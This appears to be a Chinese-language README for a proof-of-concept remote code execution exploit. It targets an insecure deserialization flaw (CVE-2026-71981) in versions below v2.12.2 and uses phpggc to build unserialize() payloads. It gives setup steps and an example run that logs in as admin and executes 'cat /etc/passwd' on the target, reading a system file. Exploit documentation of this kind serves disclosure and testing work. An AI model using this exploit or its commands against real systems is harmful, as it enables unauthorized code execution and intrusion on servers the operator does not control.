这是针对 CVE-2026-71981 不安全反序列化远程代码执行漏洞的概念验证(PoC)。执行命令的结果会打印在登出请求的响应中,位于 </body></html> 标签之后。使用 --print-all 参数可同时打印完整响应。
受影响版本:< v2.12.2
该脚本需要安装 https://github.com/ambionics/phpggc 以生成 unserialize() 载荷。
配置与示例:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help